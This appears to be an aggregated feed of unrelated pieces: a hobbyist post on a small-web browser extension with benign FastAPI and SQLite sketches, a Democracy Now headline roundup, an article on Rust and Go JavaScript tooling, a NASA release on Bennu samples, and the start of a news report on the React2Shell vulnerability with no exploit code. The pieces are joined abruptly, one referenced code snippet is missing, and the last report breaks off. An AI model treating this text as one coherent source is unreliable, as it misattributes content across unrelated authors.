It's pretty basic stuff, most of it copied from tutorials scattered around the Internet. However I really want to drive home to users that this is not a Serious Thing. I'm not a company, this isn't a new social media network, and there are no plans to "grow" this concept beyond the original idea unless people smarter than me ping me with ideas. So I found this amazing CSS library:
https://sakofchit.github.io/system.css/
Apple's System OS design from the late '80s to the early '90s was one of my personal favorites, and I think it sends a strong signal to users that this is not a professional, modern service.
Great, the basic layout works. Let's move on!
Backend
So I ended up doing FastAPI because it's very easy to write. I didn't want to spend a ton of time writing the API because I doubt I nailed the API design on the first round. I use sqlalchemy for the database. The basic API layout is as follows:
admin - mostly just generating read-only reports, like "how many websites are there"
leaderboard - So this is my first attempt at trying to get users involved. Submit a website that other people like? Get points, climb the leaderboard. (A rough sketch of what the serve-and-vote endpoints could look like follows below.)
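Purely as an illustration (this is not the project's actual code), here is a minimal FastAPI sketch of the serve-and-vote idea described in this post: one endpoint returns a random page, weighted so that pages with more upvotes come back more often, and another records a vote. The pages table and every name in it are hypothetical.

# Hypothetical sketch only -- the table and endpoint names are made up.
import random
import sqlite3

from fastapi import FastAPI

app = FastAPI()
DB = "smallweb.db"

def pick_weighted_page(conn: sqlite3.Connection):
    # "If more people like a thing, more people see it": weight each page
    # by its net score, with a floor of 1 so unrated pages still surface.
    rows = conn.execute(
        "SELECT url, title, likes, dislikes FROM pages WHERE reported = 0"
    ).fetchall()
    if not rows:
        return {"error": "no pages indexed yet"}
    weights = [max(1, likes - dislikes + 1) for (_, _, likes, dislikes) in rows]
    url, title, likes, dislikes = random.choices(rows, weights=weights, k=1)[0]
    return {"url": url, "title": title, "score": likes - dislikes}

@app.get("/random")
def random_page():
    with sqlite3.connect(DB) as conn:
        return pick_weighted_page(conn)

@app.post("/vote")
def vote(url: str, up: bool):
    column = "likes" if up else "dislikes"  # column name comes from our own literal
    with sqlite3.connect(DB) as conn:
        conn.execute(f"UPDATE pages SET {column} = {column} + 1 WHERE url = ?", (url,))
    return {"ok": True}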
The source for the RSS feeds came from the (very cool) Kagi Small Web GitHub repo:
https://github.com/kagisearch/smallweb
Basically I assume that websites that have submitted their RSS feeds there are cool with me (very rarely) checking for new posts and adding them to my database. If you want the same thing as this does, but as an iFrame, that's the Kagi Small Web service.
The scraping work is straightforward. We make a background worker that grabs 5 feeds every 600 seconds, checks for new content on each feed, and then waits until the 600 seconds have elapsed to grab 5 more from the smallweb list of RSS feeds. Since we have a lot of feeds, this ends up looking like we're checking for new content less than once a day, which is the interval that I want.
Then we write it out to a SQLite database and basically track whether a URL has been reported (if so, it goes into a review queue) and how many times it has been liked or disliked. I considered a "real" database, but honestly SQLite is getting more and more scalable every day and it's impossible to beat the immediate startup and functionality. Plus it's very easy to back up to encrypted object storage, which is super nice for a hobby project where you might wipe the prod database at any moment.
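For illustration only, here is roughly what that polling loop could look like; it's a sketch under assumptions, not the actual implementation. It assumes the feedparser library, a feeds list of RSS/Atom URLs from the smallweb repo, and the same hypothetical pages table as above (with url as its unique key).

# Hypothetical polling worker: a deliberately slow crawl over the feed list.
import sqlite3
import time

import feedparser

DB = "smallweb.db"
BATCH_SIZE = 5          # feeds checked per cycle
CYCLE_SECONDS = 600     # one batch every 10 minutes

def crawl_forever(feeds):
    position = 0
    while True:
        started = time.monotonic()
        batch = feeds[position:position + BATCH_SIZE]
        position = (position + BATCH_SIZE) % max(len(feeds), 1)

        with sqlite3.connect(DB) as conn:
            for feed_url in batch:
                parsed = feedparser.parse(feed_url)
                for entry in parsed.entries:
                    # INSERT OR IGNORE relies on url being unique, so re-checking
                    # a feed doesn't create duplicate rows.
                    conn.execute(
                        "INSERT OR IGNORE INTO pages "
                        "(url, title, likes, dislikes, reported) VALUES (?, ?, 0, 0, 0)",
                        (entry.get("link"), entry.get("title", "")),
                    )

        # Sleep off whatever is left of the 600-second window.
        elapsed = time.monotonic() - started
        time.sleep(max(0, CYCLE_SECONDS - elapsed))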
In terms of user onboarding I ended up doing the "make an account with an email, I send a link to verify the email" flow. I actually hate this flow and I don't really want to know a user's email. I never need to contact you and there's not a lot associated with your account, which makes this especially silly. I have a ton of email addresses and no real "purpose" in having them. I'd switch to Sign in with Apple, which is great from a security perspective, but not everybody has an Apple ID.
I also did a passkey version, which worked fine but the OSS passkey handling was pretty rough still and most people seem to be using a commercial service that handled the "do you have the passkey? Great, if not, fall back to email" flow. I don't really want to do a big commercial login service for a hobby application.
Auth is a JWT, which actually was a pain and I regret doing it. I don't know why I keep reaching for JWTs, they're a bad user experience and I should stop.
Can I just have the source code?
I'm more than happy to release the source code once I feel like the product is in a somewhat stable shape. I'm still ripping down and rewriting relatively large chunks of it as I find weird behavior I don't like or just decide to do things a different way.
In the end it does seem to do what's on the label. We have over 600,000 individual pages indexed.
So how is it to use?
Honestly I've been pretty pleased. But there are some problems.
First I couldn't find a reliable way of switching the keyboard shortcuts to be Mac/Windows specific. I found some options for querying platform but they didn't seem to work, so I ended up just hardcoding them as Alt which is not great.
The other issue is that when you are making an extension, you spend a long time working with the manifest.json. The specific part I really wasn't sure about was:
I'm not entirely sure if that's all I'm doing? I think so from reading the docs.
Anyway, I built this mostly for me. I have no idea if anybody else will enjoy it. But if you are bored I encourage you to give it a try. It should be pretty lightweight and straightforward if you crack open the extension and look at it. I'm not loading any analytics into the extension, so basically until people complain about it, I don't really know if it's going well or not.
Future stuff
I need to sort stuff into categories so that you get more stuff in genres you like. I don't 100% know how to do that, maybe there is a way to scan a website to determine the "types" of content that is on there with machine learning? I'm still looking into it.
There's a lot of junk in there. I think if we reach a certain number of downvotes I might put it into a special "queue".
I want to ensure new users see the "best stuff" early on but there isn't enough data to determine "best vs worst".
I wish there were more independent photography and science websites. Also more crafts. That's not really a "future thing", just me putting a hope out into the universe. Non-technical beta testers get overwhelmed by technical content.
Headlines for December 5, 2025
Democracy Now!
www.democracynow.org
2025-12-05 13:00:00
“One of the Most Troubling Things I’ve Seen”: Lawmakers React to U.S. “Double-Tap” Boat Strike, Pentagon Watchdog Finds Hegseth’s Use of Signal App “Created a Risk to Operational Security”, CNN Finds Israel Killed Palestinian Aid Seekers and Bulldozed ...
“One of the Most Troubling Things I’ve Seen”: Lawmakers React to U.S. “Double-Tap” Boat Strike
Dec 05, 2025
The Pentagon has announced the U.S. blew up another boat in the eastern Pacific, killing four people. The Pentagon claimed the boat was carrying drugs but once again offered no proof. The U.S. has now killed at least 87 people in 22 strikes on boats since September. This comes as controversy continues to grow over a September 2 strike, when the U.S. targeted and killed two men who had survived an initial attack. Nine people were killed in the first strike. On Thursday, members of Congress were shown video of two men being killed at a time when they were clinging to the side of their overturned boat. Democratic Representative Jim Himes of Connecticut spoke after watching the video.
Rep. Jim Himes: “What I saw in that room was one of the most troubling things I’ve seen in my time in public service. You have two individuals in clear distress without any means of locomotion, with a destroyed vessel, who are killed by the United States.”
Lawmakers also questioned Admiral Frank “Mitch” Bradley, the operation’s commanding officer. Many questions remain over Defense Secretary Pete Hegseth’s role. The Washington Post recently reported Hegseth had ordered Pentagon officials to “kill everybody” on the boat.
Pentagon Watchdog Finds Hegseth’s Use of Signal App “Created a Risk to Operational Security”
Dec 05, 2025
The Pentagon’s inspector general has released its report examining Hegseth’s sharing of sensitive information about U.S. strikes in Yemen on a Signal group chat earlier this year. The report found Hegseth’s actions “created a risk to operational security that could have resulted in failed U.S. mission objectives and potential harm to U.S. pilots.” The report also criticized Hegseth’s use of a personal cellphone to conduct official business. Hegseth himself refused to cooperate with the investigation, refusing to hand over his phone or sit for an interview.
CNN Finds Israel Killed Palestinian Aid Seekers and Bulldozed Bodies into Shallow, Unmarked Graves
Dec 05, 2025
Israel’s military is continuing to pound the Gaza Strip in violation of the October 10 ceasefire agreement. Al Jazeera reports Israeli ships opened fire toward the coast of Khan Younis, while air raids struck the city of Rafah. There are reports of explosions and Israeli artillery fire around Gaza City, including airstrikes near the Maghazi refugee camp.
Meanwhile, a CNN investigation has found the Israeli military fired indiscriminately at starving Palestinians collecting sacks of flour near an aid distribution site near the Zikim crossing in June, then bulldozed their bodies into shallow, unmarked graves, with some bodies left to decompose or be partially eaten by dogs. Gaza officials and the United Nations estimate about 10,000 Palestinians remain missing from Israel’s more than two-year assault, while the official death toll recently passed 70,000.
Ireland, Slovenia, Spain and the Netherlands to Boycott Eurovision over Israel’s Participation
Dec 05, 2025
Image Credit: 'The Rising Star' Keshet 12
Public broadcasters in Ireland, Slovenia, the Netherlands and Spain said Thursday they will boycott the 2026 Eurovision Song Contest, after the European Broadcasting Union refused to hold a vote on whether to exclude Israel. This is José Pablo López, president of Spain’s national broadcaster.
José Pablo López
: “We maintain the same position we had months ago when we said Israel’s participation in the Eurovision festival was untenable for two main reasons, firstly because the genocide it has perpetuated in Gaza. As president of the corporation, I keep thinking that Eurovision is a contest, but human rights are not a contest.”
Eurovision is among the most popular TV and online events in the world; last year, viewers from 156 countries cast votes for their favorite contestants.
Protesters Picket New Jersey Warehouse, Seeking to Block Arms Shipments to Israel
Dec 05, 2025
In New Jersey, protesters picketed this morning outside a Jersey City warehouse that is used to transport military cargo to Israel. A recent report by the Palestinian Youth Movement and Progressive International found the warehouse handles over 1,000 tons of Israel-bound military cargo every week, including thousands of MK-84 2,000-pound bombs that have been used to level Gaza.
Supreme Court Allows Texas to Use Racially Gerrymandered Congressional Map Favoring Republicans
Dec 05, 2025
The U.S. Supreme Court has cleared the way for Texas to use a new congressional map designed to help Republicans pick up as many as five seats next year. A lower court had previously ruled the redistricting plan was unconstitutional because it would likely dilute the political power of Black and Latino voters. Liberal Supreme Court Justice Elena Kagan wrote in her dissent, “This court’s stay ensures that many Texas citizens, for no good reason, will be placed in electoral districts because of their race. And that result, as this court has pronounced year in and year out, is a violation of the constitution.”
FBI Arrests Suspect for Allegedly Planting Pipe Bombs on Capitol Hill Ahead of Jan. 6 Insurrection
Dec 05, 2025
The FBI has arrested a 30-year-old man from Virginia for allegedly planting pipe bombs near the Republican and Democratic National Committee headquarters in January 2021 — on the night before the January 6 insurrection at the U.S. Capitol. The suspect, Brian Cole, is expected to appear in court today.
DOJ Asks Judge to Rejail Jan. 6 Rioter Pardoned by Trump, After Threats to Rep. Jamie Raskin
Dec 05, 2025
The Justice Department has asked a judge to rejail a participant in the January 6 insurrection who had been pardoned by President Trump. The Justice Department made the request after the man, Taylor Taranto, showed up near the home of Democratic Congressmember Jamie Raskin, who served on the January 6 House Select Committee. Security has been increased for Raskin. In October, Taranto was sentenced to time served for making a threat near the home of former President Obama.
Grand Jury Refuses to Reindict Letitia James After Judge Throws Out First Indictment
Dec 05, 2025
A federal grand jury in Virginia has declined a second attempt by the Justice Department to indict New York Attorney General Letitia James on charges that she lied in her mortgage application. In a statement, Letitia James wrote, “As I have said from the start, the charges against me are baseless. It is time for this unchecked weaponization of our justice system to stop.” It’s the latest defeat to President Trump’s campaign of retribution against his political enemies. The Trump administration is reportedly considering a third attempt to obtain an indictment against James.
Protesters Ejected from New Orleans City Council Meeting After Demanding “ICE-Free Zones”
Dec 05, 2025
Image Credit: New Orleans City Council
In New Orleans, about 30 activists were ejected from a City Council meeting Thursday after calling for “ICE-free zones” and asking local leaders to do more to protect immigrants. During a public comment period, members of the public went to the microphone one by one and were cut off when it became clear they wanted to speak on immigration, which wasn’t on the formal agenda.
Brittany Cary: “And I’m asking City Council for ICE-free zones. Make all city-owned property ICE-free zones, and prohibit ICE and DHS from using city property to stage their operations. No collaboration with ICE. City Council must pass ordinances that codify noncollaboration” —
Chair: “Ma’am?”
Brittany Cary: — “between the city of New Orleans and ICE, including all of its offices and” —
Chair: “As I stated previously, that is not germane. Thank you for your comments.”
The protests came as the Border Patrol announced a surge of more than 200 federal immigration agents into New Orleans, which the agency is calling “Operation Catahoula Crunch.” They aim to make 5,000 arrests over two months. We’ll go to New Orleans later in the broadcast.
Honduran Presidential Candidate Nasralla Blames Trump’s Interference as Opponent Takes Lead
Dec 05, 2025
Honduran presidential candidate Salvador Nasralla has alleged fraud after his conservative rival Nasry Asfura regained the lead, as election officials continue to tally up votes from Sunday’s election. Nasralla also accused President Trump of interfering in the race by publicly backing Asfura. Some election officials have also publicly criticized the election process. On Thursday, Marlon Ochoa, who serves on Honduras’s National Electoral Council, decried what she called an electoral “coup.” She said, “I believe there is unanimity among the Honduran people that we are perhaps in the least transparent election in our democratic history.”
Trump Hosts Leaders of DRC and Rwanda in D.C. as U.S. Signs Bilateral Deals on Minerals
Dec 05, 2025
President Trump welcomed the leaders of the Democratic Republic of Congo and Rwanda to Washington, D.C., Thursday for the signing of an agreement aimed at ending decades of conflict in the eastern DRC. Trump also announced the U.S. had agreed to bilateral deals that will open the African nations’ reserves of rare earth elements and other minerals to U.S. companies. The signing ceremony was held in the newly renamed Donald J. Trump Institute of Peace.
Trump Struggles to Stay Awake in Another Public Event, Adding to Speculation over His Health
Dec 05, 2025
During Thursday’s event, Trump struggled to keep his eyes open. This follows other recent public appearances where Trump appeared to fall asleep at times. And once again, Trump was spotted wearing bandages on his right hand, which appeared bruised and swollen. That fueled further speculation about the president’s health. On Monday, the White House said the results from Trump’s recent MRI exam were “perfectly normal,” after Trump was unable to tell reporters aboard Air Force One what part of his body was scanned.
Reporter: “What part of your body was the MRI looking at?”
President Donald Trump: “I have no idea. It was just an MRI. What part of the body? It wasn’t the brain, because I took a cognitive test, and I aced it. I got a perfect mark, which you would be incapable of doing. Goodbye, everybody. You, too.”
Netflix Announces $72 Billion Deal to Buy Warner Bros. Discovery
Dec 05, 2025
In business news, Netflix has announced it will buy Warner Bros. in a deal worth at least $72 billion. The deal could reshape the entertainment and media industry, as it will give Netflix control of Warner’s movie and TV studios, as well as the HBO Max streaming service.
12 Arrested as Striking Starbucks Workers Hold Sit-In Protest at Empire State Building
Dec 05, 2025
Image Credit: X/@FightForAUnion
In labor news, a dozen striking Starbucks workers were arrested in New York City Thursday as they blocked the doors to the Empire State Building, where Starbucks has a corporate office. Starbucks workers at over 100 stores are on strike.
Judge Sentences California Animal Rights Activist to 90 Days in Jail for Freeing Abused Chickens
Dec 05, 2025
A University of California student has been ordered to serve 90 days in jail for breaking into a Sonoma County poultry slaughterhouse and freeing four chickens. Twenty-three-year-old Zoe Rosenberg of Berkeley received the sentence on Wednesday, after a jury convicted her in October of felony conspiracy and three misdemeanor counts. She was ordered to pay more than $100,000 to Petaluma Poultry, which is owned by the agribusiness giant Perdue Farms. Rosenberg’s supporters with the group Direct Action Everywhere say the chickens she rescued were worth $24; they’re reportedly alive and well at a sanctuary for rescued farm animals. Rosenberg told supporters her action was prompted by investigations that found routine violations of California’s animal cruelty laws at Petaluma Poultry slaughterhouses.
Zoe Rosenberg: “We found that there were dead birds among the living, that the air quality was so poor that chickens were struggling to breathe. I myself was struggling to breathe even with a KN95 mask as I investigated this facility. … And we have been calling on the California attorney general to take action, because the Sonoma County District Attorney’s Office has made it abundantly clear that they do not care about these animals whatsoever, that they care far more about the profits of Perdue, a company that makes over $10 billion a year on the backs of these animals.”
National Park Service Prioritizes Free Entry on Trump’s Birthday Over Juneteenth and MLK Holidays
Dec 05, 2025
The Trump administration has ended a policy granting visitors free access to national parks on the Juneteenth and Martin Luther King Jr. Day holidays. Instead, the 116 parks that charge entrance fees will now waive admission charges on June 14 — President Trump’s birthday.
The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Over the last couple of years, we've witnessed a remarkable shift in the
JavaScript ecosystem, as many popular developer tools have been rewritten in
systems programming languages like Rust, Go, and Zig.
This transition has delivered dramatic performance improvements and other
innovations that are reshaping how developers build JavaScript-backed
applications.
In this article, we'll explore the driving forces behind this revolution, its
implications for the wider ecosystem, and some of the most impactful projects
leading the charge.
The shift toward building JavaScript tooling in systems languages is a response
to real, mounting pressure in the ecosystem. While JavaScript engines have
become remarkably fast over the years, the language itself wasn't designed for
CPU-heavy workloads.
Modern JavaScript applications aren't just a few scripts anymore — they're
sprawling codebases with thousands of dependencies, complex module graphs, and
extensive build pipelines.
JavaScript-based tools that were once "good enough" now struggle to keep up,
leading to sluggish build times, laggy editor experiences, and frustratingly
slow feedback loops.
That's where languages like Rust and Go come in. They offer native performance,
better memory management, and efficient concurrency — all of which translate into
tooling that's not just faster, but more reliable and scalable.
Rust, in particular, with its seemingly cult-like following, has become the language
of choice for much of this new wave. Its growing popularity has inspired a new
generation of developers who care deeply about correctness, speed, and user
experience. This has created a virtuous cycle where we get more tools and
faster innovation.
All of this points to a broader realization in the JavaScript world: if we want
tooling that scales with the demands of modern development, we have to look
beyond JavaScript itself.
Let's look at some of the most influential and promising tools redefining the
JavaScript developer experience: SWC, ESBuild, BiomeJS, Oxc, FNM/Volta, and TypeScript in Go.
1. SWC
SWC
was among the first major JavaScript
tools written in a language other than JavaScript itself (Rust), thus
establishing a pattern that many others would follow.
At its core, it provides a high-performance platform for JavaScript/TypeScript
transpilation, bundling, minification, and transformation through WebAssembly.
It has been largely successful in its goal of serving as a drop-in replacement
for Babel, delivering transpilation speeds up to 20x faster while maintaining
broad compatibility with most Babel configurations.
2. ESBuild
At a time when most developer tools were still being written in JavaScript, the
idea of using systems languages like Go or Rust was considered more of an
experiment than a trend.
But
ESBuild
changed that. In many ways, it sparked
a broader wave of interest in building faster, lower-level tools that could
dramatically improve the developer experience.
Created by Evan Wallace (former CTO of Figma), ESBuild was purpose-built to
replace legacy bundlers like Webpack and Rollup with a much faster, simpler
alternative. It achieves
10–100x faster performance
in tasks like bundling, minification, and transpilation due to its Go-backed
architecture.
Its speed, minimal configuration, and modern architecture have since influenced
a generation of tools and helped shift the expectations around what JavaScript
tooling
should
feel like, and for this reason, it remains the most adopted
non-JavaScript tool to date, with over 50 million weekly downloads on NPM.
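For a sense of how lightweight that is in practice, here is a minimal sketch of driving esbuild from its JavaScript API rather than the CLI; the entry point and output path are placeholder values for this example.

// Minimal sketch: bundling and minifying with esbuild's JavaScript API.
// Run as an ES module; "src/index.ts" and "dist/bundle.js" are placeholder paths.
import * as esbuild from "esbuild";

await esbuild.build({
  entryPoints: ["src/index.ts"], // placeholder entry file
  bundle: true,                  // follow imports and produce a single output file
  minify: true,                  // shrink the emitted code
  sourcemap: true,               // write a source map alongside the bundle
  target: "es2020",              // syntax level of the output
  outfile: "dist/bundle.js",     // placeholder output path
});

console.log("Bundle written to dist/bundle.js");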
3. BiomeJS
BiomeJS
is an ambitious Rust-based project that combines
code formatting and linting into a single high-performance JavaScript toolchain.
It benefits from Rust's multi-threaded architecture for dramatic speed gains
(up to ~100x faster depending on the hardware).
BiomeJS simplifies the development workflow by consolidating these functions
into a unified configuration system, eliminating the need to manage separate
tools with overlapping functionality.
Though it's still catching up to its more established counterparts in language
support and extensibility, it is an increasingly attractive option for anyone
seeking better performance and simpler tooling.
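To give a flavour of that unified configuration, here is a rough sketch of a biome.json that enables both the formatter and the linter in one place. The field names follow Biome's documented configuration but should be treated as approximate and checked against the current docs before use.

{
  "formatter": {
    "enabled": true,
    "indentStyle": "space",
    "indentWidth": 2
  },
  "linter": {
    "enabled": true,
    "rules": {
      "recommended": true
    }
  }
}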
4. Oxc
A newer entrant to the field,
Oxc
is a collection of
Rust-based JavaScript tools focusing on linting, formatting, and transforming
JavaScript/TypeScript code.
It is part of the
VoidZero project
founded
by Evan You (creator of Vue.js and Vite), and aims to be the backbone for the
next-generation of JavaScript tooling.
Oxc's headline features include:
A JavaScript parser that's 3x faster than SWC.
A TypeScript/JSX transformer that's 20x to 50x faster than Babel.
An ESLint-compatible linter that runs significantly faster (~50-100x).
oxlint has been a massive win for us at Shopify. Our previous linting setup
took 75 minutes to run, so we were fanning it out across 40+ workers in CI. By
comparison, oxlint takes around 10 seconds to lint the same codebase on a
single worker, and the output is easier to interpret. We even caught a few
bugs that were hidden or skipped by our old setup when we migrated!
5. FNM/Volta
Modern Node.js version management has greatly improved with tools like
Fast Node Manager (fnm)
and
Volta
, which are compelling alternatives
to
NVM
. Another option is
Mise
, which supports Node.js along with many other
development tools.
These Rust-based tools offer significantly faster shell initialization times and
full cross-platform support with a much smaller memory footprint.
They address long-standing pain points in NVM, such as sluggish startup and lack
of Windows compatibility, while adding conveniences like per-project version
switching and seamless global package management.
6. TypeScript in Go
While Microsoft's Go-based port of the TypeScript compiler is still in active development, preliminary benchmarks already show
remarkable improvements
in build times (~10x for VS Code's codebase), editor startup speeds, and memory
usage.
This native port addresses TypeScript's scaling challenges in large codebases,
where developers previously had to compromise between snappy editor performance
and rich type feedback.
While some viewed the choice of Go over Rust as a missed opportunity, given the
latter's dominance in modern JavaScript tooling, the
rationale behind this decision
aligns well with the project's practical goals:
The existing code base makes certain assumptions -- specifically, it assumes
that there is automatic garbage collection -- and that pretty much limited our
choices. That heavily ruled out Rust. I mean, in Rust you have memory
management, but it's not automatic; you can get reference counting or whatever
you could, but then, in addition to that, there's the borrow checker and the
rather stringent constraints it puts on you around ownership of data
structures. In particular, it effectively outlaws cyclic data structures, and
all of our data structures are heavily cyclic.
— Anders Hejlsberg, creator of TypeScript
Microsoft intends to ship the Go-based implementation as TypeScript 7.0 in the
coming months, but
native previews
are already available for experimentation.
Beyond the clear performance gains, the rise of native tooling for JavaScript
brings deeper, ecosystem-wide implications.
With many established and upcoming tools now relying on entirely different
runtimes and ecosystems, contributing becomes less accessible to the majority of
JavaScript developers.
At the same time, this shift may influence the skill sets that developers choose
to pursue in the first place. While not everyone needs to write systems-level
code, understanding how these languages work and what they make possible will
drive even more innovative tooling in the coming years.
Unsurprisingly, although learning Rust or Zig presents a steeper barrier to
entry, developers overwhelmingly prefer faster tools (even if they're harder to
contribute to).
One other subtle but important tradeoff is the loss of dogfooding: when tool creators stop building their tools in the language those tools serve, they give up a practice that has historically kept them in tune with the experience they're shaping.
Moving to a different implementation language can weaken that feedback loop, and
while many projects are aware of this risk, the long-term impact of a lack of
dogfooding remains an open question.
The tools covered here represent just a slice of the growing ecosystem of
performance-focused, native-powered developer tools, and the momentum behind
this new wave is undeniable.
Other notable efforts in this space include
Turbopack and Turborepo
(from Vercel),
Dprint
(a Prettier alternative), and even
full-fledged runtimes like
Bun
(written in Zig) and
Deno
(Rust), which reimagine what's possible by rebuilding
JavaScript infrastructure from the ground up.
Together, these tools reflect a broader shift in the JavaScript world that makes
it clear that the future of JavaScript tooling is being written in Rust, Go,
Zig, and beyond.
Wrapping Up
In this post, we explored several tools driving a new wave of performance and innovation across the JavaScript ecosystem.
The performance revolution in JavaScript tooling is a fascinating case study in
ecosystem evolution.
Instead of being constrained by the limitations of JavaScript itself, the
community has pragmatically embraced other languages to push the boundaries of
what's possible.
Sugars, Gum, Stardust Found in NASA's Asteroid Bennu Samples
The asteroid Bennu continues to provide new clues to scientists’ biggest questions about the formation of the early solar system and the origins of life. As part of the ongoing study of pristine samples delivered to Earth by NASA’s OSIRIS-REx (Origins, Spectral Interpretation, Resource Identification, and Security-Regolith Explorer) spacecraft, three new papers published Tuesday by the journals Nature Geoscience and Nature Astronomy present remarkable discoveries: sugars essential for biology, a gum-like substance not seen before in astromaterials, and an unexpectedly high abundance of dust produced by supernova explosions.
Sugars essential to life
Scientists led by Yoshihiro Furukawa of Tohoku University in Japan found sugars essential for biology on Earth in the Bennu samples, detailing their findings in the journal
Nature Geoscience
. The five-carbon sugar ribose and, for the first time in an extraterrestrial sample, six-carbon glucose were found. Although these sugars are not evidence of life, their detection, along with
previous detections
of amino acids, nucleobases, and carboxylic acids in Bennu samples, shows that building blocks of biological molecules were widespread throughout the solar system.
For life on Earth, the sugars deoxyribose and ribose are key building blocks of DNA and RNA, respectively. DNA is the primary carrier of genetic information in cells. RNA performs numerous functions, and life as we know it could not exist without it. Ribose in RNA is used in the molecule’s sugar-phosphate “backbone” that connects a string of information-carrying nucleobases.
“All five nucleobases used to construct both DNA and RNA, along with phosphates, have already been found in the Bennu samples brought to Earth by OSIRIS-REx,” said Furukawa. “The new discovery of ribose means that all of the components to form the molecule RNA are present in Bennu.”
The discovery of ribose in asteroid samples is not a complete surprise. Ribose has previously been found in two
meteorites
recovered on Earth. What is important about the Bennu samples is that researchers did not find deoxyribose. If Bennu is any indication, this means ribose may have been more common than deoxyribose in environments of the early solar system.
Researchers think the presence of ribose and lack of deoxyribose supports the “RNA world” hypothesis, where the first forms of life relied on RNA as the primary molecule to store information and to drive chemical reactions necessary for survival.
“Present day life is based on a complex system organized primarily by three types of functional biopolymers: DNA, RNA, and proteins,” explains Furukawa. “However, early life may have been simpler. RNA is the leading candidate for the first functional biopolymer because it can store genetic information and catalyze many biological reactions.”
The Bennu samples also contained one of the most common forms of “food” (or energy) used by life on Earth, the sugar glucose, which is the first evidence that an important energy source for life as we know it was also present in the early solar system.
Mysterious, ancient ‘gum’
A second paper, in the journal
Nature Astronomy
led by Scott Sandford at NASA’s Ames Research Center in California’s Silicon Valley and Zack Gainsforth of the University of California, Berkeley, reveals a gum-like material in the Bennu samples never seen before in space rocks – something that could have helped set the stage on Earth for the ingredients of life to emerge. The surprising substance was likely formed in the early days of the solar system, as Bennu’s young parent asteroid warmed.
Once soft and flexible, but since hardened, this ancient “space gum” consists of polymer-like materials extremely rich in nitrogen and oxygen. Such complex molecules could have provided some of the chemical precursors that helped trigger life on Earth, and finding them in the pristine samples from Bennu is important for scientists studying how life began and whether it exists beyond our planet.
Bennu’s ancestral asteroid formed from materials in the solar nebula – the rotating cloud of gas and dust that gave rise to the solar system – and contained a variety of minerals and ices. As the asteroid began to warm, due to natural radiation, a compound called carbamate formed through a process involving ammonia and carbon dioxide. Carbamate is water soluble, but it survived long enough to polymerize, reacting with itself and other molecules to form larger and more complex chains impervious to water. This suggests that it formed before the parent body warmed enough to become a watery environment.
“With this strange substance, we’re looking at, quite possibly, one of the earliest alterations of materials that occurred in this rock,” said Sandford. “On this primitive asteroid that formed in the early days of the solar system, we’re looking at events near the beginning of the beginning.”
Using an infrared microscope, Sandford’s team selected unusual, carbon-rich grains containing abundant nitrogen and oxygen. They then began what Sandford calls “blacksmithing at the molecular level,” using the Molecular Foundry at Lawrence Berkeley National Laboratory (Berkeley Lab) in Berkeley, California. Applying ultra-thin layers of platinum, they reinforced a particle, welded on a tungsten needle to lift the tiny grain, and shaved the fragment down using a focused beam of charged particles.
When the particle was a thousand times thinner than a human hair, they analyzed its composition via electron microscopy at the Molecular Foundry and X-ray spectroscopy at Berkeley Lab’s Advanced Light Source. The ALS’s high spatial resolution and sensitive X-ray beams enabled unprecedented chemical analysis.
“We knew we had something remarkable the instant the images started to appear on the monitor,” said Gainsforth. “It was like nothing we had ever seen, and for months we were consumed by data and theories as we attempted to understand just what it was and how it could have come into existence.”
The team conducted a slew of experiments to examine the material’s characteristics. As the details emerged, the evidence suggested the strange substance had been deposited in layers on grains of ice and minerals present in the asteroid.
It was also flexible – a pliable material, similar to used gum or even a soft plastic. Indeed, during their work with the samples, researchers noticed the strange material was bendy and dimpled when pressure was applied. The stuff was translucent, and exposure to radiation made it brittle, like a lawn chair left too many seasons in the sun.
“Looking at its chemical makeup, we see the same kinds of chemical groups that occur in polyurethane on Earth,” said Sandford, “making this material from Bennu something akin to a ‘space plastic.’”
The ancient asteroid stuff isn’t simply polyurethane, though, which is an orderly polymer. This one has more “random, hodgepodge connections and a composition of elements that differs from particle to particle,” said Sandford. But the comparison underscores the surprising nature of the organic material discovered in NASA’s asteroid samples, and the research team aims to study more of it.
By pursuing clues about what went on long ago, deep inside an asteroid, scientists can better understand the young solar system – revealing the precursors to and ingredients of life it already contained, and how far those raw materials may have been scattered, thanks to asteroids much like Bennu.
Abundant supernova dust
Another paper in the journal
Nature Astronomy
, led by Ann Nguyen of NASA’s Johnson Space Center in Houston, analyzed presolar grains – dust from stars predating our solar system – found in two different rock types in the Bennu samples to learn more about where its parent body formed and how it was altered by geologic processes. It is believed that presolar dust was generally well-mixed as our solar system formed. The samples had six times more supernova dust than any other studied astromaterial, suggesting the asteroid’s parent body formed in a region of the
protoplanetary disk
enriched in the dust of dying stars.
The study also reveals that, while Bennu’s parent asteroid experienced extensive alteration by fluids, there are still pockets of less-altered materials within the samples that offer insights into its origin.
“These fragments retain a higher abundance of organic matter and presolar silicate grains, which are known to be easily destroyed by aqueous alteration in asteroids,” said Nguyen. “Their preservation in the Bennu samples was a surprise and illustrates that some material escaped alteration in the parent body. Our study reveals the diversity of presolar materials that the parent accreted as it was forming.”
NASA’s Goddard Space Flight Center provided overall mission management, systems engineering, and the safety and mission assurance for OSIRIS-REx. Dante Lauretta of the University of Arizona, Tucson, is the principal investigator. The university leads the science team and the mission’s science observation planning and data processing. Lockheed Martin Space in Littleton, Colorado, built the spacecraft and provided flight operations. Goddard and KinetX Aerospace were responsible for navigating the OSIRIS-REx spacecraft. Curation for OSIRIS-REx takes place at NASA’s Johnson Space Center in Houston. International partnerships on this mission include the OSIRIS-REx Laser Altimeter instrument from CSA (Canadian Space Agency) and asteroid sample science collaboration with JAXA’s (Japan Aerospace Exploration Agency’s) Hayabusa2 mission. OSIRIS-REx is the third mission in NASA’s New Frontiers Program, managed by NASA’s Marshall Space Flight Center in Huntsville, Alabama, for the agency’s Science Mission Directorate in Washington.
For more information on the OSIRIS-REx mission, visit:
React2Shell critical flaw actively exploited in China-linked attacks
Bleeping Computer
www.bleepingcomputer.com
2025-12-05 11:26:07
Multiple China-linked threat actors began exploiting the React2Shell vulnerability (CVE-2025-55182) affecting React and Next.js just hours after the max-severity issue was disclosed. [...]...
Multiple China-linked threat actors began exploiting the React2Shell vulnerability (CVE-2025-55182) affecting React and Next.js just hours after the max-severity issue was disclosed.
React2Shell
is an insecure deserialization vulnerability in the React Server Components (RSC) 'Flight' protocol. Exploiting it does not require authentication and allows remote execution of JavaScript code in the server's context.
